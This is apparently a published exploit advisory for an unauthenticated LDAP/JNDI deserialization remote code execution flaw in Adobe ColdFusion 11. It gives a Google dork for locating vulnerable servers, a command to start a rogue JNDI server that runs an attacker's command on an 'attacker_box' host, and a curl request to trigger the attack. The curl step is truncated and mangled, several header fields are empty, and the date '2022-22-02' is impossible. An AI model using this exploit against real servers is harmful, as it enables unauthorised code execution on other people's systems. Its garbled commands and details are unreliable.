Authored by Amel Bouziane-Leblond

Adobe ColdFusion version suffers from an LDAP Java object deserialization remote code execution vulnerability.

# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
# Google Dork: intext:"adobe coldfusion 11"
# Date: 2022-22-02
# Exploit Author: Amel BOUZIANE-LEBLOND (
# Vendor Homepage:
# Version: Adobe Coldfusion (
# Tested on: Microsoft Windows Server & Linux

# Description:
# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc

==================== 1.Setup rogue-jndi Server ====================

==================== 2.Preparing the Attack =======================

java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"

==================== 3.Launch the Attack ==========================


curl -i -s -k -X $'GET'
-H $'Host: target'
--data-binary $'x0dx0ax0dx0a'

==================== 4.RCE =======================================

Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8
Can be done by modify the pom.xml as below